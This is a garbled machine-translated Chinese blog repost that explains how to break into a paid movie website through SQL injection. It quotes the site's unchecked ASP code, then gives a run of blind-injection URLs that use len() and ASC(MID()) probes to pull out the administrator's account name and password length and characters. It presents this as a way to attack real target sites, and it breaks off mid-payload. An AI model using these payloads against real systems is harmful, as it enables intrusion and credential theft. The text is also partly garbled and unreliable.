2. Tech
  3. Simple intrusion toll movie website

Simple intrusion toll movie website

xiaoxiao2021-03-06  78

Today, I will go shopping online, I found a post, it is about how to invade the free movie website. In fact, the program is very simple. It is written by ASP. I believe that friends who have learned ASP programs should understand, the specific content is as follows : Recently, I learned SQL Injection, download the Jinmei Charge Movie 2003 Member Edition reads a pass, found that Movie.asp has problems: DIM SQL DIM RS ArticleId = Request ("ID") SET RS = Server.createObject ("AdoDB. Recordset ") SQL =" Update Learning Set Hits = Hits 1 Where Articles = "& Articleid Rs.open SQL, CONN, 1, 3 SQL =" SELECT * from Learning Where ArticleID = "& ArticleID Rs.Open SQL, CONN, 1, 1 title = rs ("Title") ITTYPE = RS ("TypeID") does not have any checks for variables, then don't blame me, huh, huh, find a target website, we start testing the number of bits of the administrator account, because save The field name of the administrator account is Name, so the statement is: http://www.target.com/movie.asp?id=330 and 1 = (Select ID from password where len (name)> 4) Normal return page, From this we can know that the administrator's account is greater than 4 digits! We continue, http://www.target.com/movie.asp?id=330 and 1 = (Select ID from password where len (name)> " Unable to display a web page, an error, where we can know that the administrator's account is greater than or equal to 8 digits, http://www.target.com/movie.asp?id=330 and 1 = (Select ID from Password where len (name) = 8) Normal return to the page, so that the Name is 8 bits http://www.target.com/movie.asp?id=330 and 1 = (Select ID from Password Where L En (pwd) = 21) Normal return page PWD is 21 digits, TNND, so long! Whether we start testing the user name http://www.target.com/movie.asp?id= 320 and 1 = (SELECT ID from password where ASC (MID (Name, 1, 1))> 50) Normal return page, it seems not big enough. Note: The MID function can divide the password into several parts, use the method MID ( String, starting position, taken of the length of the string of strings) http://www.target.com/movie.asp?id=320 and 1 = (Select ID from password where ASC (MID (Name, 1, 1) )> 100) "Unable to display the page", it seems to be smaller than 100. http://www.target.com/movie.asp?id=320 and 1 = (Select ID from password where ASC (MID (Name, 1 1)) =

转载请注明原文地址:https://www.9cbs.com/read-93466.html

9cbs

New Post(0)